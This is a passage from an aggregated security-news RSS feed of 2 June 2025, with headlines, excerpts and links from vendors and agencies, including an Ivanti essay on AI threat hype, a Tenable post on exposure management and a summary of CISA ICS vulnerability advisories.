members and clients with the ability to export Key Document Summaries, complete with working document links.  Aviator Review – More intuitive than ever  In our ongoing effort to increase efficiency and automate first-pass review, we have simplified the OpenText eDiscovery Aviator Review process to two simple steps:   Input your review criteria  Identify the designated document set on which you want Aviator Review to run It is really that easy, and after the Aviator results are returned, legal teams have the option to quickly QC the document set using the “compare with human review toggle” and selecting the coded review field to be used for comparison.  Expanded bulk redaction capabilities   Accurate and consistent redaction of privileged, confidential, or sensitive information across all document formats is a critical component for reducing production risks.   Inadvertent production of privileged or sensitive information is a legal team’s worst nightmare.  As the type of data involved in litigation and investigations continues to become more diverse—going far beyond email and Word documents—it's essential that bulk redaction tools keep pace.  That's why we're pleased to expand OpenText eDiscovery bulk redaction to support the chat-specific redaction view.  We have also added support for Social Security Number patterns in the Bulk Redaction wizard for the native Excel viewer, the audio/video viewer (Cloud only), and the HTML chat viewer.    Additional new redaction capabilities include:  New “change redaction” functionality for the near native Excel viewer, the audio/video viewer (Cloud only), and the HTML chat viewer The ability to centrally manage the addition and deletion of redaction reasons from within the Review & Analysis module The addition of a dedicated Regular Expressions (RegEx) tester to support users writing their own customized RegEx for bulk redaction An improved RegEx pattern search for birthdates These updates in OpenText eDiscovery CE 25.2 represent our ongoing commitment to providing powerful, user-friendly tools for modern eDiscovery workflows. By introducing new functionality and enhancing existing key features, we're responding to our most frequent customer requests and helping legal teams work more efficiently and effectively than ever before, delivering better outcomes for their clients and organizations.  The post OpenText™ eDiscovery CE 25.2: Introducing eDiscovery Chronology for enhanced evidence organization appeared first on OpenText Blogs.

https://blogs.opentext.com/opentext-ediscovery-chronology-for-enhanced-evidence-organization/
Silent Push Events: May 2025
2025-06-02T13:53:49Z | 1748872429

SINCON, May 22-23, Singapore  First up is SINCON 2025, held on May 22–23 at voco Orchard Singapore.  This year’s event focused on advancing cybersecurity through technical exploration and innovation, with a strong emphasis on proactive defense strategies and knowledge sharing. Our CEO, Ken Bagnall, gave a talk on “Finding Adversary Infrastructure Before the Attack with […] The post Silent Push Events: May 2025 appeared first on Silent Push.

https://www.silentpush.com/blog/may-events/
Silent Push Events: May 2025
2025-06-02T13:53:49Z | 1748872429

SINCON, May 22-23, Singapore  First up is SINCON 2025, held on May 22–23 at voco Orchard Singapore.  This year’s event focused on advancing cybersecurity through technical exploration and innovation, with a strong emphasis on proactive defense strategies and knowledge sharing. Our CEO, Ken Bagnall, gave a talk on “Finding Adversary Infrastructure Before the Attack with […] The post Silent Push Events: May 2025 appeared first on Silent Push.

https://www.silentpush.com/blog/may-events/
Attacker exploits misconfigured AI tool to run AI-generated payload
2025-06-02T13:45:00Z | 1748871900

The Sysdig Threat Research Team (TRT) recently observed a malicious threat actor targeting a misconfigured system hosting Open WebUI, a... The post Attacker exploits misconfigured AI tool to run AI-generated payload appeared first on Sysdig.

https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/
Attacker exploits misconfigured AI tool to run AI-generated payload
2025-06-02T13:45:00Z | 1748871900

The Sysdig Threat Research Team (TRT) recently observed a malicious threat actor targeting a misconfigured system hosting Open WebUI, a... The post Attacker exploits misconfigured AI tool to run AI-generated payload appeared first on Sysdig.

https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/
Beyond Credentials: When Every Data Point Becomes a Weapon
2025-06-02T13:32:56Z | 1748871176

You know what's interesting about data breaches? Everyone focuses on credit card numbers and financial data, but the reality is that every piece of information has value to someone.

https://blog.knowbe4.com/beyond-credentials-when-every-data-point-becomes-a-weapon
French Users Targeted by Major Phishing Campaign
2025-06-02T13:32:40Z | 1748871160

Researchers at IBM Security warn that a major phishing campaign is targeting users in France, incorporating leaked personal data to make the emails more convincing.

https://blog.knowbe4.com/french-users-targeted-by-major-phishing-campaign
Sophos Named a 2025 Gartner® Peer Insights™ Customers’ Choice for both Endpoint Protection Platforms and Extended Detection and Response
2025-06-02T13:30:48Z | 1748871048

Customers have recognized Sophos for the 4th consecutive time

https://news.sophos.com/en-us/2025/06/02/sophos-named-a-2025-gartner-peer-insights-customers-choice-for-both-endpoint-protection-platforms-and-extended-detection-and-response/
The Journey to AI-Driven Autonomous Networks
2025-06-02T13:18:50Z | 1748870330

For anyone who attended Mobile World Congress (MWC) in March, talk of artificial intelligence (AI) was everywhere. No matter what booth you visited, AI was the conversation du jour. In some respects, it was a bit overwhelming. There is certainly no doubt that AI holds the promise of important benefits for telcos. The...

https://www.netscout.com/blog/journey-ai-driven-autonomous-networks
Kritisk sårbarhet i Roundcube
2025-06-02T13:04:00Z | 1748869440

Roundcube informerar om en sårbarhet (CVE-2025-49113) i Roundcube webmail. [1]

https://www.cert.se/2025/06/kritisk-sarbarhet-i-roundcube.html
AI threat hype: why chasing ghosts leaves real vulnerabilities exposed
2025-06-02T13:00:03Z | 1748869203

With AI at the center of media and industry focus, cybersecurity teams are increasingly putting pressure on themselves to prepare for AI-fueled cyber attacks. According to Ivanti’s 2025 State of Cybersecurity research, half of IT security professionals ranked “yet unknown weaknesses” as a high or critical threat – the same as or higher than compromised credentials, supply chain risks, DDoS attacks and other real-world threats. These “unknown” concerns remain more hype than substance for the moment. In fact, the Picus 2025 Red Report found no notable uptick in the use of AI-driven malware techniques in 2024. The report goes on to state that “AI enhances productivity but doesn't yet redefine malware.” In other words, adversaries are leveraging AI in their attacks – automating phishing content, debugging malicious code, accelerating reconnaissance – but they’re not creating fundamentally new attack classes. Traditional attack techniques still dominate the cyber landscape, yet many teams remain fixated on speculative threats. The big takeaway? Stop worrying about hypothetical AI-powered launches from beyond the front lines and focus on defending against the threats that are putting your organization most at risk today. Real threats vs. AI hype: misaligned risk prioritization Ever since ChatGPT started capturing headlines in November 2022, the world has been saturated with anticipation of the potential impact of AI. Analysts are projecting AI will inject $15.7 trillion into the global economy by 2030, and the tech is also increasingly shaping daily workflows across industries. So, it’s no surprise that AI is dominating boardroom talk. Since CISOs and security leaders are tasked with preparing for worst-case scenarios, they’re understandably alert to what AI could do in the wrong hands. However, an issue arises when much of this attention is focused on novel AI-generated threats. Less focus is being paid to the main way that we’re already seeing attackers use AI — as a tool to amplify familiar existing threats. AI synthetic digital content — such as manipulated media and deepfakes — and AI-based spoofing attacks — such as using gen AI to mimic someone’s voice and tone — were both top-ranked predicted AI-related threats for 2025, with 53% of security professionals rating their threat levels as “high / critical.” Yet in practice, these AI-generated threat types are not yet as commonplace as traditional phishing techniques and ransomware attacks where we see AI speed up attackers’ efforts to an unprecedented rate. The result is a risk prioritization model that skews toward theoretical rather than real-life considerations. Critical gaps in threat preparedness persist Ivanti’s report also paints a troubling picture: real-world threats are outpacing organizational preparedness across multiple critical categories. The problem isn’t a lack of awareness; rather, it’s that security hygiene is inconsistent. The gaps are still there: weak credential management, patch delays, untested incident plans and API / third-party blind spots. In short, new risks coming from AI aren’t the issue – it’s more that AI is strengthening existing threats. Consider the top five areas in which our research found defenders are falling behind – not because security teams lack awareness, but rather, the fundamentals are being inconsistently enforced, and AI is helping adversaries exploit them more efficiently: 1. Ransomware attacks Ransomware remains a top threat with 58% of security professionals ranking it as high/critical. Yet only 29% say their teams are prepared to defend themselves against ransomware attacks. Despite this, many organizations still lack tested backup and recovery protocols, haven’t segmented their networks effectively and run outdated IR plans. When it comes to gen AI’s ability to ramp up ransomware threats, security teams may face even quicker code iteration, more automated vulnerability chaining and adaptive payload construction that can circumvent defenses. Attackers are also using AI to create virtual simulations for testing ahead of deployment – and adjusting their strategies accordingly. 2. API-related exposures The increasing use of API-supported software has also increased the risk of API exposures. API-related vulnerabilities was the second highest ranked threat type by the security professionals Ivanti surveyed with 52% rating it a “high / critical” threat. Yet just 31% of security teams said they felt “very prepared” to defend against API attacks — a 21% preparedness gap. Threat actors can now automate the discovery of endpoints through traffic analysis, reverse engineering poorly documented APIs and generating fuzzing inputs to identify logic flaws. Once they’re inside, they exploit permission creep, unvalidated input or weak auth mechanisms. Still on the cybersecurity front, AI can also be a useful tool to analyze large amounts of API traffic data in real-time to identify issues and patterns that may indicate an attack. 3. Software vulnerabilities Overall software vulnerabilities had a worrying 19-point gap between “high / critical” threat level and preparedness. Security teams still struggle with critical issues around departmental silos, inaccessible data and tech debt that make managing their expanding attack surface challenging. Ivanti’s report found that 45% of security teams said they lacked data to confidently identify specific vulnerabilities. Furthermore, more than half of organizations surveyed — 51% — admitted to using software that has reached end-of- life and therefore would not be regularly updated and patched to ensure security compliance. Security and IT teams are struggling to maintain patch hygiene, especially across legacy systems and shadow IT environments. This isn’t only a tooling problem. Patching cycles and security response times are slowed by security and IT having misaligned priorities – and AI is widening the gap between those who patch quickly and those who wait. 4. Compromised credentials Like software vulnerabilities, the preparedness gap for compromised credentials also sits at 19%. Stolen credentials are an easy way in for attackers, even more so when paired with AI’s capabilities to scale credential stuffing attacks, simulate human-like login behavior and adapt to multi-step authentication flows. Gen AI is also utilized to analyze leaked datasets and identify reused passwords or credential patterns across platforms. What was once a manual grind is now becoming a fully automated infiltration process. And yet, MFA coverage remains patchy, and identity governance is often an afterthought. AI is simply exposing how poorly it’s implemented. 5. Phishing Phishing has long been a mainstay method for attackers to breach an organization’s defenses. Yet even now, only 37% of cybersecurity teams say they’re readily prepared to defend against phishing threats. This lag has never been more of a concern as we’ve seen how phishing methods evolve with AI and attackers have the capabilities to create convincing deepfake content and personalize attacks using scraped public data. Organizations clearly have a lot of work to do to bridge the gaps in their defenses and combat prominent threats because we know that these threats are not going away but continuing to evolve and develop. However, there is some positive news behind the AI threat hype which is that AI and automation can also serve as powerful tools to bolster cybersecurity teams' efforts as well. AI cybersecurity tools: foe or friend? Exploring the other side of the AI conversation, cybersecurity leaders have begun to view AI as an asset in bolstering defenses. Ivanti’s 2024 report “Gen AI and Cybersecurity: Risk and Reward” found that 90% of security professionals believe that gen AI benefits security teams as much or more than threat actors. Some ways organizations today use AI tools include automating threat detection and triage, accelerating log analysis, increasing anomaly spotting and simulating different attack methods. Gen AI does not need to be only a looming threat but should be seen as another tool to help security teams more effectively identify weaknesses in their defenses and proactively address vulnerabilities. Recommendations to refocus on cybersecurity fundamentals AI threats are of course real threats, and cybersecurity teams shouldn’t disregard the growing use of AI in cyber attacks. However, with cybersecurity and IT teams dealing with a lack of talent / skills and battling burnout, they need to prioritize security resources on the most prominent and impactful types of threats. Rather than spend time, budget and personnel crafting a security strategy around speculative AI threats, defenders should be doubling down on security best practices and fundamentals such as: Identifying attack surface gaps Remediating existing exposures Ensuring rigorous credential protection and access controls Your vulnerability and threat management strategy needs to focus primarily on proactively identifying and managing the most pressing threats to your organization rather than on trying to guard against speculated future threats, especially when unknown. Security teams can’t know the threat level of abstract unidentified threats and thus can’t act on them. It’s more beneficial to gain a comprehensive, real-time view of your attack surface and use that to understand your organization’s current risk posture. Real cybersecurity leadership isn’t about chasing hypotheticals. Rather, it’s about systematically reducing exposure through full visibility, quick validation and risk-based prioritization. Here’s what today’s leading security leaders are doing, and what you should do to stay ahead: 1. Continuously monitor your complete attack surface Teams can’t protect what they’re not able to see. As such, ensure a real-time, continuously updating view of every exposure point to have visibility into the entire landscape. With limited resources, you cannot prepare for every unknown potential threat. Instead, teams need a framework for assessing their attack surface and classifying known and unknown vulnerabilities. 2. Prioritize threat response based on overall impact threat and risk to business Go beyond scanning for existing gaps and opportunities – run simulations, use red teams and adopt behavior-based analytics to validate which exposures are actually exploitable. Leverage frameworks like MITRE ATT&CK, threat intelligence and your own readings to identify exposures and prioritize remediation efforts based on an established risk framework that considers critical factors such as exploitability and overall impact to your organization’s wider business objectives. 3. Leverage AI to accelerate defenses AI is a threat vector, but it’s also a force multiplier for cybersecurity teams. Use AI in cybersecurity to its fullest potential, surfacing anomalies in real time, automating log analyses, generating simulations and reducing manual obligation. The hype is real, but especially in the way you apply it in such a way that it speeds up and tightens response. Real cybersecurity leadership is forged in present-day focus and near-future developments. This means making surgical decisions under pressure, identifying actual risk and driving measurable reduction.  Forget the future unknowns – focus on what’s known Research reveals that many security teams are overestimating the predicted risks of AI-powered threats, and they’re underprepared to defend against the actual threats targeting them today. Cybersecurity teams need to realign cyber defense strategies to reflect reality or risk unnecessary damages. The truth is, AI may redefine the scale and speed of cyber attacks, but even with new AI capabilities, today’s attackers are still using the same old tricks. The winning cybersecurity strategies won’t put all of their time and resources into building AI-resistant walls – they’ll be the ones proactively readying defenses to fend off the threats right in front of them. Check out Ivanti’s 2025 Cybersecurity Report to benchmark your readiness and close the preparedness gap.

https://www.ivanti.com/blog/ai-cybersecurity-threats
Moving Beyond Silos with Exposure Management
2025-06-02T13:00:00Z | 1748869200

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, Tenable’s chief security officer Robert Huber looks at how exposure management can help you move beyond silos. You can read the entire Exposure Management Academy series here.The way we use technology — in IT, cloud security, operational technology (OT), internet of things (IoT), AI and countless applications — has led to a corresponding array of specialized security tools. Think about all the tools you use: vulnerability assessment, identity security, endpoint detection and response (EDR), data loss prevention (DLP), cloud native application protection platforms (CNAPP), mail protection, cloud access security broker (CASB), mobile device management (MDM) and privilege access management (PAM). That’s a lot of tools — and a lot of silos. But it doesn’t end there. Each of those tools has a subset of capabilities that can result in even more silos across your security program. Of course, all of this reflects the issues we face and the way our organizations are structured. But, sadly, attackers don’t care about our org charts or toolsets. And thank goodness they haven’t figured out how to use pivot tables yet!They just look for weaknesses, exploit them and move laterally across domains to achieve their goals. In fact, those silos we’ve built can inadvertently help them by hindering communication and context between teams, making it difficult to see our true exposures — or the risks that pose a real threat.As a security leader myself, I know this pain firsthand. Buried in fragmented dataBefore adopting a more unified approach, I constantly felt like I was buried in fragmented data from countless tools and teams. Much of my day was lost to context-switching, trying to manually piece together a coherent picture from disconnected silos. This makes communicating clear priorities incredibly difficult. You often can't compare apples-to-apples, leading to subjective decisions about which risk truly matters most. It’s an exhausting, inefficient cycle that makes it hard to confidently answer a key question: "What should we focus on right now?" It also makes it tough to report accurately on our risk posture.This struggle highlights why distinguishing significant exposures from the background noise of all possible weaknesses is so critical for effective risk management. If you want to reduce your risk, you need to identify the problems that truly matter most to your organization. Key questions to ask yourself as you evaluate your organization’s exposures include:Is it preventable? Most breaches start with something that could have been fixed, such as a misconfiguration, a known vulnerability or unnecessary privileges.Is it exploitable? An attacker needs a way to actually use the weakness. This could be via a known exploit code, weak passwords or multi-factor authentication (MFA) identity compromise.Is it impactful? A weakness that results in lost revenue, data theft or operational downtime could significantly harm the organization's mission. Linking technical risk to potential business impact is key.What’s holding security leaders back?Too often, we approach security in fragments, unlike attackers who look for any viable path. This leaves us struggling to be strategic. Some of the common roadblocks include:Lack of a unified view: Different tools focus on specific domains or risk types, so no single platform provides a complete view of the attack surface.Inconsistent risk scoring: Each tool uses its own metrics, which makes it hard to compare relative risk across the environment or understand the cumulative risk associated with critical assets.Missing technical context: If you don’t connect the dots between assets, identities and their associated risks, it's impossible to understand the likely attack paths available to adversaries.Missing business context: Security data often lacks information about which assets support critical business functions, hindering the ability to prioritize based on potential business impact.Proactive prevention just makes senseHistorically, a significant portion of our security investments focused on detecting and responding to attacks already in progress. This makes sense because it’s where breaches cause obvious damage.But regulations and best practices are changing. Rules from the U.S. Securities and Exchange Commission (SEC) (requiring reporting of material impact within four days for public companies) and the Cybersecurity and Infrastructure Security Agency (CISA) (requiring reporting of “substantial cyber incidents” within three days for critical infrastructure) mandate much faster transparency and accountability. The timeframe for understanding and disclosing significant incidents is shrinking dramatically.This pressure, combined with the high cost of breaches, increases the strategic importance of finding and fixing significant exposures before they lead to reportable incidents and material impact. Investing proactively in understanding and reducing exposure is often far less costly and disruptive than managing the fallout of a major breach. Reduce risk and increase security ROI.Optimizing prioritization and preventing breachesUnderstanding how breaches happen and the limitations of siloed security points to the need for a more integrated, exposure-focused strategy. This isn't about abandoning detection and response capabilities. On the contrary, it’s about augmenting those capabilities by strengthening preventative security to better understand and prioritize risks before they cause harm.Solving this requires a structured approach. As my colleague Nathan Dyer wrote in Five Steps to Move to Exposure Management, the core principles involve:Gaining comprehensive visibility across the entire attack surface, including assets and identitiesIdentifying all forms of preventable risk, such as vulnerabilities, misconfigurations and privilege issues with consistent, contextualized scoringCritically aligning technical risk with business context to understand potential impact and prioritizing remediation on the exposures and attack paths, including key choke points, that pose the greatest threat to critical functionsContinuously measuring and communicating exposure to optimize security investments and report effectively to stakeholders, including the boardExposure management platforms support this lifecycle, providing capabilities to aggregate disparate data, calculate risk scores (like asset exposure scores, vulnerability priority rating, asset criticality rating) that incorporate exploitability and criticality, map assets to business functions, visualize attack paths, identify choke points for efficient remediation, and provide dashboards for tracking and reporting exposure trends against internal goals or industry benchmarks.Ultimately, by breaking down data silos and adopting an exposure management mindset, security leaders can gain a more holistic view of their attack surface and true business risk. This enables better resource allocation, more defensible prioritization, clearer communication about security posture and, ultimately, a more effective preventative security program aligned with organizational objectives.TakeawaysHere’s my advice to security leaders fighting silos and looking to move to exposure management.Think like an attacker: Adversaries exploit seams between siloed views. Security strategy must strive for a unified understanding of the attack surface.Focus on material exposure: Prioritize risks that are preventable, exploitable and demonstrably impactful to critical business functions, not just technically severe in isolation.Drive strategic outcomes: Implementing an exposure management approach enables more effective resource allocation, clearer communication of risk posture to stakeholders (including the board) and ultimately, a more defensible and efficient security program.Have a question about exposure management you’d like us to tackle?We’re all ears. Share your question and maybe we’ll feature it in a future post. MktoForms2.loadForm("//info.tenable.com", "934-XQB-568", 14070);

https://www.tenable.com/blog/moving-beyond-silos-with-exposure-management
CISA Issues Advisories Highlighting Siemens SiPass and Other Critical Vulnerabilities targeting ICS systems
2025-06-02T12:49:47Z | 1748868587

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released five new ICS advisories this week, drawing attention to severe vulnerabilities affecting industrial and medical systems worldwide. Among the most notable disclosures are flaws in Siemens SiPass, Consilium’s CS5000 Fire Panel, Instantel Micromate, and others. CISA's advisories, released under alert codes ICSA-25-148-01 through ICSA-25-148-04, along with ICSMA-25-148-01, include vulnerability scores, mitigation strategies, and analysis of potential exploitation. Organizations across the manufacturing, healthcare, transportation, and energy sectors are urged to review these findings promptly. CISA’s New ICS Advisories this Week Siemens SiPass Advisory (ICSA-25-148-01) Among the high-profile advisories is a serious vulnerability in Siemens SiPass, a widely used access control system in critical manufacturing environments. Vulnerability: Improper Verification of Cryptographic Signature (CWE-347) CVE: CVE-2022-31807 CVSS v3.1 Score: 6.2 CVSS v4 Score: 8.2 This flaw could allow an attacker to install malicious firmware on affected devices. If exploited remotely or via a man-in-the-middle attack, a bad actor could compromise system integrity without needing physical access. All versions of SiPass integrated AC5102 (ACC-G2) and ACC-AP are affected. Siemens has not issued a fix yet but recommends enabling TLS encryption to protect firmware transfers. The company also stresses the importance of operating devices in secure IT environments, following Siemens’ industrial security guidelines. Siemens SiPass Integrated (ICSA-25-148-02) Another ICS advisory was issued for Siemens SiPass Integrated, specifically addressing a remote denial-of-service vulnerability. Vulnerability: Out-of-bounds Read (CWE-125) CVE: CVE-2022-31812 CVSS v3.1 Score: 7.5 CVSS v4 Score: 8.7 This issue affects versions prior to V2.95.3.18 and could allow an unauthenticated attacker to crash the application by sending malformed packets. Airbus Security first reported the vulnerability, and Siemens recommends updating to version V2.95.3.18 or newer to mitigate the issue. Consilium Safety CS5000 Fire Panel (ICSA-25-148-03) CISA also reported two critical vulnerabilities in the Consilium CS5000 Fire Panel, which is used in commercial, energy, healthcare, and transportation facilities. Vulnerabilities: Initialization with Insecure Defaults (CWE-1188) – CVE-2025-41438 Use of Hard-Coded Credentials (CWE-798) – CVE-2025-46352 CVSS v4 Score for both: 9.3 The CS5000 contains a default SSH-enabled account with elevated permissions and a hard-coded VNC password visible within the binary itself. These backdoors allow attackers to remotely control or disable the fire panel. Reported by Andrew Tierney of Pen Test Partners, these vulnerabilities currently have no fixes. Users are urged to upgrade to post-July 2024 fire panels or implement compensating controls like strict physical access. Instantel Micromate (ICSA-25-148-04) Used in vibration monitoring across critical manufacturing, Micromate devices by Instantel are vulnerable due to a lack of authentication on a configuration port. Vulnerability: Missing Authentication for Critical Function (CWE-306) CVE: CVE-2025-1907 CVSS v4 Score: 9.3 An attacker could remotely send commands to the device without any credentials. Instantel is working on a firmware update and advises users to restrict IP access and monitor device exposure in the meantime. Santesoft Sante DICOM Viewer Pro (ICSMA-25-148-01) In the healthcare domain, Sante DICOM Viewer Pro, a diagnostic imaging tool, contains a memory corruption flaw. Vulnerability: Out-of-Bounds Read (CWE-125) CVE: CVE-2025-5307 CVSS v4 Score: 8.4 Researcher Michael Heinzl reported that if a local attacker successfully exploits this vulnerability, it could lead to information disclosure or arbitrary code execution. Santesoft has released an updated version (v14.2.2) to address the issue. Mitigation and Recommendations CISA recommends the following proactive security measures to reduce risk and improve resilience across industrial and healthcare environments: Conduct comprehensive risk assessments before applying any mitigation strategies to understand system impact and exposure. Minimize internet exposure of industrial control systems (ICS) and medical devices to prevent unauthorized access. Segment control networks from corporate or business networks to limit lateral movement in case of compromise. Implement Zero Trust access principles to ensure strict verification at every access point, regardless of user location or device. Regularly update software and firmware across all ICS, medical, and networked systems to patch known vulnerabilities. Conclusion The latest ICS advisories reinforce a sobering reality: vulnerabilities in control systems like Siemens SiPass, Consilium’s fire panels, and Instantel’s monitoring tools could lead to business disruption and financial loss. As attackers continue to exploit weak spots in critical infrastructure, the need for smarter, faster vulnerability management is more urgent than ever. Cyble empowers organizations with advanced, AI-driven intelligence to mitigate zero-day threats, prioritize patching based on real-world risk, and protect both IT and ICS environments. By combining vulnerability data, dark web insights, exploit intelligence, and asset context into a unified platform, Cyble helps security teams act faster, reduce attack surfaces, and prevent breaches before they occur. See Cyble in action — request a DEMO today. References: https://www.cisa.gov/news-events/alerts/2025/05/29/cisa-releases-five-industrial-control-systems-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-01 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-02 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-03 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-04 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-148-01 The post CISA Issues Advisories Highlighting Siemens SiPass and Other Critical Vulnerabilities targeting ICS systems appeared first on Cyble.

https://cyble.com/blog/cisa-flags-critical-siemens-sipass-ics-flaws/
US community bank says thieves drained customer data through third party hole
2025-06-02T12:27:13Z | 1748867233

Disclosure at MainStreet Bancshares comes as American finance orgs beg for looser reporting requirements Community bank MainStreet Bancshares says thieves stole data belonging to some of its customers during an attack on a third-party provider.

https://go.theregister.com/feed/www.theregister.com/2025/06/02/mainstreet_bancshares_says_thirdparty_breach/
An industry first: Sophos Firewall and NDR Essentials
2025-06-02T12:01:45Z | 1748865705

Sophos Firewall is once again pioneering new innovations.

https://news.sophos.com/en-us/2025/06/02/an-industry-first-sophos-firewall-and-ndr-essentials/
Sophos Firewall v21.5 is now available
2025-06-02T12:00:49Z | 1748865649

New innovations and top-requested features

https://news.sophos.com/en-us/2025/06/02/sophos-firewall-v21-5-is-now-available/
Sigma Specification 2.0: What You Need to Know
2025-06-02T12:00:43Z | 1748865643

Sigma rules have become the security team equivalent of LEGO bricks and systems. With LEGO, people can build whatever they can imagine by connecting different types of bricks. With Sigma Specification 2.0 rules, security teams can create vendor-agnostic detections without being limited by proprietary log formats.   In response to the Sigma rules’ popularity, the […] The post Sigma Specification 2.0: What You Need to Know appeared first on Graylog.

https://graylog.org/post/sigma-specification-2-0-what-you-need-to-know/
Streamline Regulation Mandates With NIST CSF and Secure Workload
2025-06-02T12:00:17Z | 1748865617

Cisco Secure Workload serves as a foundational solution for organizations seeking to implement an effective microsegmentation strategy.

https://blogs.cisco.com/security/streamline-regulation-mandates-with-nist-csf-and-secure-workload/
Cisco Research: Innovation Funding Gap Revealed in Canadian Businesses
2025-06-02T12:00:00Z | 1748865600

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-innovation-funding-gap-revealed-in-canadian-businesses.html
Redefining infrastructure strategy for a fragmented, hybrid future
2025-06-02T12:00:00Z | 1748865600

Cisco, Nutanix, and Pure Storage redefine infrastructure with adaptable solutions, enabling best-in-class tech deployment and seamless, silo-free operations.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/redefining-infrastructure-strategy-for-a-fragmented-hybrid-future.html
Cisco Research: Innovation Funding Gap Revealed in Canadian Businesses
2025-06-02T12:00:00Z | 1748865600

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-innovation-funding-gap-revealed-in-canadian-businesses.html
Cisco Research: Innovation Funding Gap Revealed in Canadian Businesses
2025-06-02T12:00:00Z | 1748865600

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-innovation-funding-gap-revealed-in-canadian-businesses.html
Cisco Research: Innovation Funding Gap Revealed in Canadian Businesses
2025-06-02T12:00:00Z | 1748865600

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-innovation-funding-gap-revealed-in-canadian-businesses.html
Redefining infrastructure strategy for a fragmented, hybrid future
2025-06-02T12:00:00Z | 1748865600

Cisco, Nutanix, and Pure Storage redefine infrastructure with adaptable solutions, enabling best-in-class tech deployment and seamless, silo-free operations.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/redefining-infrastructure-strategy-for-a-fragmented-hybrid-future.html
Victoria’s Secret Security Incident Shuts Down Website
2025-06-02T12:00:00Z | 1748865600

Victoria’s Secret took down its United States website after a security incident.

https://www.securitymagazine.com/articles/101661-victorias-secret-security-incident-shuts-down-website
⚡ Weekly Recap: APT Intrusions, AI Malware, Zero-Click Exploits, Browser Hijacks and More
2025-06-02T11:23:00Z | 1748863380

If this had been a security drill, someone would’ve said it went too far. But it wasn’t a drill—it was real. The access? Everything looked normal. The tools? Easy to find. The detection? Came too late. This is how attacks happen now—quiet, convincing, and fast. Defenders aren’t just chasing hackers anymore—they’re struggling to trust what their systems are telling them. The problem isn’t too...

https://thehackernews.com/2025/06/weekly-recap-apt-intrusions-ai-malware.html
Hackers are using fake tool installers to dupe victims – and AI tools like ChatGPT are a key target
2025-06-02T11:20:58Z | 1748863258

Cisco Talos said it has uncovered malware disguised as a lead monetization platform and a ChatGPT installer

https://www.itpro.com/security/cyber-attacks/hackers-are-using-fake-tool-installers-to-dupe-victims-and-ai-tools-like-chatgpt-are-a-key-target
With Ongoing Transition to SAP BTP, SAP Business Network Accelerates Innovation
2025-06-02T11:15:00Z | 1748862900

Innovation continues for SAP Business Network, with several new capabilities announced at SAP Sapphire.

https://news.sap.com/2025/06/sap-btp-sap-business-network-innovation/
Boosting Threat Detection with NDR and Logpoint SIEM
2025-06-02T10:55:31Z | 1748861731

2 July 2025, 10:30 - 11:15Join us for an exclusive live webinar, where Paul Gower and Esben Mogensen will explore how Network Detection and Response (NDR) can elevate your cybersecurity detection capabilities. Learn how integrating NDR with your existing Logpoint SIEM can provide unparalleled network visibility, detect sophisticated threats, and accelerate response times. Our security [...] The post Boosting Threat Detection with NDR and Logpoint SIEM appeared first on Logpoint.

https://www.logpoint.com/en/webinars/boosting-threat-detection-with-ndr/
The Secret Defense Strategy of Four Critical Industries Combating Advanced Cyber Threats
2025-06-02T10:55:00Z | 1748861700

The evolution of cyber threats has forced organizations across all industries to rethink their security strategies. As attackers become more sophisticated — leveraging encryption, living-off-the-land techniques, and lateral movement to evade traditional defenses — security teams are finding more threats wreaking havoc before they can be detected. Even after an attack has been identified, it can...

https://thehackernews.com/2025/06/the-secret-defense-strategy-of-four.html
Glitch-hosted Phishing Uses Telegram & Fake CAPTCHAs to Target Navy Federal Credit Union Customers
2025-06-02T10:00:00Z | 1748858400

Summary From January to April 2025, Netskope Threat Labs tracked a three-fold increase in traffic to phishing pages created on the Glitch platform. These phishing campaigns have affected more than 830 organizations and over 3,000 users since January 2025, primarily targeting Navy Federal Credit Union members and seeking sensitive information. Still, they also go after […] The post Glitch-hosted Phishing Uses Telegram & Fake CAPTCHAs to Target Navy Federal Credit Union Customers appeared first on Netskope.

https://www.netskope.com/blog/glitch-hosted-phishing-uses-telegram-fake-captchas-to-target-navy-federal-credit-union-customers
Security Issues Found in preinstalled apps on Android Smartphones
2025-06-02T09:24:07Z | 1748856247

Security researchers have uncovered several critical vulnerabilities in applications preloaded on Ulefone and Krüger&Matz Android smartphones. These flaws, reported by CERT Polska and discovered by Szymon Chadam, expose users to significant risks, including potential data theft and device manipulation by malicious applications. In specific, third party app installed on the same device could by misusing […] The post Security Issues Found in preinstalled apps on Android Smartphones first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/06/02/security-issues-found-in-android-smartphones/
Don’t let dormant accounts become a doorway for cybercriminals
2025-06-02T09:00:00Z | 1748854800

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

https://www.welivesecurity.com/en/cybersecurity/dont-let-dormant-accounts-become-doorway-cybercriminals/
